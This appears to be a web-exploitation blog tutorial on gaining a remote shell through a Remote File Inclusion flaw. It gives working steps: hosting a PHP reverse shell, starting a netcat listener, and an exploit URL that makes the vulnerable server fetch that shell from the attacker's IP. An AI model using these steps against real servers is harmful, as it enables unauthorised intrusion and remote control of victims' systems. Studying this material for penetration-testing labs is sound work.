web analytics

Own A Server With A Remote File Inclusion

Remote File Inclusions (RFIs) is similar to a Local File Inclusion (LFI) and occur when a HTML GET request has an unsanitized variable input. Unlike a LFI, Remote File Inclusions allow you to reach across the internet and execute any file you desire. Combine this with hosting your own malicious php reverse shell, and you can quickly gain a remote shell on the vulnerable server.

1 – When a RFI is identified, use python -m SimpleHTTPServer 80 in the folder holding your php-reverse-shell. You can use other ports besides 80 but I recommend keeping either 80 or 443 because many firewalls will block traffic to other ports.

Hosting the PHP reverse shell on the attacker’s computer

2 – The next step is to set up a netcat listener to catch the php script’s call back to you. If you used port 80 for the SimpleHTTPServer, use port 443 for your netcat listener. The command is nc -nvlp 443 anywhere in the terminal.

3 – Once you are hosting your php file, exploit the RFI vulnerability which will look something along the lines of: 192.168.0.10/VulnerablePlugin/index.php?path=http://192.168.0.9/reverseshell.php%00 in the URL. In this example, 192.168.0.10 is the vulnerable web server who has the RFI vulnerability. You are hosting the shell with you SimpleHTTPServer at your IP address 192.168.0.9.

The attacker replaces the unsanitized path variable with their own http server hosting a reverse PHP shell

4 – Check your netcat listener to see if you have gained a shell on the victim. If the exploit failed, first check your SimpleHTTPServer to see if your RFI correctly grabbed the file from your server. If SimpleHTTPServer shows the victim did not grab the file than your error is in the RFI syntax in the URL. If the victim DID grab the file but you do not have a shell than you need to fix your payload.

Here you see the victim’s system downloading from the attacker’s simple HTTP server after the RFI attack

For a list of reverse shells in different languages and formats, I recommend checking out PentestMonkey who compiled an impressive variety. Make sure you check out the highly functional php-reverse-shell.php script he developed.

Tags: exploit, Hacking, Remote Code Execution, Remote File Inclusion, Tutorials, web exploitation

Related Posts

Previous Post Next Post

Leave a Reply

Your email address will not be published.

0 shares